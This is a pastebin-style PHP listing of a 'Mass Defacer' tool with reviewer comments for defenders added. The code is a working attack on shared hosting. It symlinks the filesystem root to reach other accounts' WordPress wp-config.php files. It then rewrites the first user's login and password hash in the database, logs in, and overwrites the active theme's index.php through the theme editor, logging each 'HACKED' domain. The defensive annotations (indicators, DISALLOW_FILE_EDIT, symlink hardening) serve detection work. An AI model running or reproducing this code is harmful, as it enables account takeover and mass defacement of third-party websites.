
Untitled

a guest
Jun 20th, 2017
<?php
// Review note: the script opens by hiding its own failures and removing the
// execution time limit, then starts a session and records its own directory.
// Error display is switched off at runtime, so a failing run prints nothing;
// responders should rely on web-server access logs rather than on PHP output.
ini_set("display_errors", "0");
// 0 removes PHP's execution time limit for this request.
set_time_limit(0);
// '@' suppresses any warning from session_start(); the session is later used
// for the count1/count2 counters.
@session_start();
// Directory of this script, with trailing slash; used later to delete COOKIE.txt.
$base_path = dirname(__FILE__).'/';
  8. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  9. $ar0=explode($marqueurDebutLien, $text);
  10. $ar1=explode($marqueurFinLien, $ar0[$i]);
  11. return trim($ar1[0]);
  12. }
  14. function randomt() {
  15. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  16. srand((double)microtime()*1000000);
  17. $i = 0;
  18. $pass = '';
  19. while ($i <= 7) {
  20. $num = rand() % 33;
  21. $tmp = substr($chars, $num, 1);
  22. $pass = $pass . $tmp;
  23. $i++;
  24. }
  25. return $pass;
  26. }
/**
 * Malicious routine: given the text of a WordPress wp-config.php ($conf) and
 * replacement page content ($content), take over the site's first account and
 * overwrite the active theme's index.php through the built-in theme editor.
 *
 * What the visible code does, in order:
 *  1. Extracts DB_USER, DB_PASSWORD, DB_NAME, DB_HOST and $table_prefix from $conf.
 *  2. Connects with the legacy mysql_* API and rewrites the row with ID = 1 in
 *     <prefix>users (login set to 'admin', password hash replaced).
 *  3. Reads the 'home', 'template' and 'current_theme' options.
 *  4. Logs in over HTTP at /wp-login.php, opens /wp-admin/theme-editor.php to
 *     obtain the _wpnonce and file fields, then POSTs $content as the new file body.
 *  5. Deletes COOKIE.txt and returns ['cond' => 0|1, 'output' => HTML status text].
 *
 * Review notes for defenders:
 *  - Indicators present in this listing: user ID 1 renamed to 'admin' with
 *    user_pass = 0a56f86a4ea789f555c2bdfafb61fd4a; a login POST with pwd=slymn123;
 *    the MSIE 7.0b / "Alexa Toolbar" user-agent string; a transient COOKIE.txt;
 *    a POST to theme-editor.php with action=update shortly after a login.
 *  - Step 4 depends on the dashboard file editor being enabled; setting
 *    define('DISALLOW_FILE_EDIT', true); in wp-config.php removes that path.
 *  - Step 2 depends on the database accepting these credentials from wherever
 *    the script runs, and on wp-config.php being readable by another account.
 *  - mysql_connect()/mysql_query() were removed in PHP 7, so this routine only
 *    runs on older PHP builds.
 *  - Two status strings are mislabeled, which matters when reading captured
 *    output: the failed-login branch prints "[-] Successful Login" and the
 *    successful-write branch prints "[+] index.php Failed+".
 */
function index_changer_wp($conf, $content) {
    $output = '';
    $dol = '$';
    // Scrape database settings out of the wp-config.php source text.
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    // Connect with the victim site's own credentials (legacy mysql_* extension).
    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        // Overwrites the account with ID 1. The hash is a 32-hex-digit value;
        // presumably the MD5 of the password posted to wp-login.php below.
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '0a56f86a4ea789f555c2bdfafb61fd4a' WHERE `ID` = 1");
    } else {
        $output.= "[-] DB Error<br />";
    }
    if($req1) {

        // Site base URL as stored in the options table.
        $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"];

        // Directory name of the active theme.
        $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        // Display name of the active theme (passed to the editor as 'theme').
        $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        // Fixed, dated browser string sent on every request; usable as a log signature.
        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        // Request 1: log in as the account that was just overwritten.
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=slymn123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        // Session cookies are kept in a relative-path file named COOKIE.txt.
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer = curl_exec($ch);

        // A logout link in the response is treated as proof of an authenticated session.
        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
            // NOTE(review): this is the failure branch despite the message text.
            $output.= "[-] Successful Login<br />";
        } else {
            $output.= "[+] Successful Login<br />";
        }

        // Request 2: open the theme editor on the active theme's index.php.
        $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer0 = curl_exec($ch);

        // Pull the anti-CSRF nonce and the file identifier out of the editor form.
        $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
        $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

        if(substr_count($_file,"/index.php") != 0){
            $output.= "[+] index.php Opened<br />";
        } else {
            $output.= "[-] index.php Unable to open<br />";
        }

        // Request 3: submit $content as the new body of that file.
        $url2=$site_url."/wp-admin/theme-editor.php";
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer = curl_exec($ch);
        curl_close($ch);

        // The editor's "updated" banner is taken as confirmation of the write.
        $pos = strpos($buffer,'<div id="message" class="updated">');
        $cond = 0;
        if($pos === false) {
            $output.= "[-] index.php Failed<br />";
        } else {
            // NOTE(review): this is the success branch despite the message text.
            $output.= "[+] index.php Failed+<br />";
            $cond = 1;
        }
    } else {
        $output.= "[-] DB Error<br />";
    }
    // Cookie jar is removed after each target, so it may be absent on disk
    // by the time a host is examined.
    global $base_path;
    unlink($base_path.'COOKIE.txt');
    return array('cond'=>$cond, 'output'=>$output);
}
/**
 * Malicious driver: enumerate the domains hosted on the same server, read each
 * account's wp-config.php through a symlink to the filesystem root, and hand
 * every WordPress configuration found to index_changer_wp().
 *
 * $def_url is a URL whose contents become the replacement page; at the call
 * site in this file it comes straight from the POST field 'indexadresi'.
 *
 * What the visible code does:
 *  - Creates ./sym (mode 0777) with an .htaccess that sets "Options all" and
 *    maps .php to text/plain, and a symlink ./sym/root -> /.
 *  - Reads zone names from /etc/named.conf and, per zone, resolves the owning
 *    system account from the owner of /etc/valiases/<domain>.
 *  - Fetches http://<this host>/<script dir>/sym/root/home/<account>/public_html/wp-config.php.
 *  - Appends each successfully modified domain to ./defaced.html and prints an
 *    HTML results table.
 *
 * Review notes for defenders:
 *  - Artifacts to look for next to the script: a sym/ directory containing
 *    .htaccess and a 'root' symlink to /, defaced.html, COOKIE.txt.
 *  - The technique only works where the web server follows symlinks across
 *    account boundaries and lets .htaccess change Options and handlers. Apache's
 *    SymLinksIfOwnerMatch (in place of FollowSymLinks), a restrictive
 *    AllowOverride, and listing symlink in PHP's disable_functions each break it.
 *  - It also relies on /etc/named.conf and other accounts' wp-config.php being
 *    readable; tighten those permissions and isolate accounts from each other.
 *  - The paths used (/etc/valiases, /home/<account>/public_html) suggest a
 *    cPanel-style shared host -- inferred from the paths, not stated in the code.
 */
function exec_mode_1($def_url) {

    // Working directory for the symlink trick; errors are suppressed with '@'.
    @mkdir('sym',0777);
    // .htaccess body: enables all Options and serves .php as text/plain,
    // presumably so PHP sources under sym/ are returned as text, not executed.
    $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    // Exposes the entire filesystem root beneath the web-served sym/ directory.
    @symlink('/','sym/root');
    // Zone names in the DNS server configuration serve as the list of hosted domains.
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    echo "Total Websites: $numero_dominios <br><br />";
    // Replacement page is downloaded from the caller-supplied URL and URL-encoded
    // for use inside a POST body.
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    // Other accounts' home directories, addressed over HTTP through the symlink.
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    // Append-mode log of modified sites.
    $output = fopen('defaced.html', 'a+');
    // Counters are kept across requests only when a non-empty 'st' query parameter is given.
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Script</th><th>Process</th><th>Results</th></tr>';
    $j = 1;
    // Optional start index taken from the query string.
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        // Owner of the per-domain aliases file is mapped to a system account name.
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);

        // Read that account's WordPress configuration via the symlinked path.
        $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");

        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';

        // Only responses that look like a WordPress config are processed further.
        if($config02 && preg_match('/DB_NAME/i',$config02)){
            echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
            echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
            $res = index_changer_wp($config02, $def);
            echo '<td>'.$res['output'].'</td>';
            if($res['cond']) {
                echo '<td align="center"><span class="green">HACKED</span></td>';
                // Each modified domain is recorded in defaced.html.
                fwrite($output, 'http://'.$domain."<br>");
                $_SESSION['count2'] = $_SESSION['count2'] + 1;
            } else {
                echo '<td align="center"><span class="red">unsuccessful</span></td>';
            }
            echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Deface = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
    echo '<a href="defaced.html" target="_blank">List Websites Defaced</a><br />';
}
// Review note: everything below is the operator-facing web page. The script
// performs no authentication of its own, so anyone who can reach its URL can
// trigger the run. The literal strings "Mass Defacer 1.0" and "Coded By khaloN"
// in the markup are stable text that file-integrity or webshell scanners can
// match on.
echo '<!DOCTYPE html>
<html>

<head>
<title>Mass Defacer 1.0</title>

<p>

<h1 style="color:#FF0000;text-align: center;">Mass Defacer</h1>
<style type="text/css">
body {color: white; background: #000 url(http://img02.deviantart.net/0593/i/2011/130/b/3/portugal_flag_wallpaper_by_anonymouscreative-d3g1qvl.jpg) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
input[type="submit"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
</style></p>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
}
function hide() {
document.getElementById(\'tra\').style.display = \'none\';
}
</script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">Coded By khaloN</h3>
</div>
<div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
';
// First visit (no form_action posted): show the form that asks for the URL of
// the replacement page. The form posts back to this same script.
if(!isset($_POST['form_action'])){
    echo '<div align="center">
<form action="" method="post">
<br> </br>
<input type="hidden" name="form_action" value="1"><br>Index URL:
<input type="text" name="indexadresi" value="http://site.com/index.html" /><br>

<br><input class=submit type="submit" value="DEFACE" name="Submit"></br>
</form>
</div>';
}
echo '<div align="center">';
// A POST carrying form_action=1 starts the run; the posted 'indexadresi' value
// is passed through unvalidated. In access logs this shows up as a POST to the
// script itself with the fields form_action, indexadresi and Submit.
if($_POST['form_action'] == 1) {
    exec_mode_1($_POST['indexadresi']);
}
echo '</div>
</div>




</body>
</html>';
?>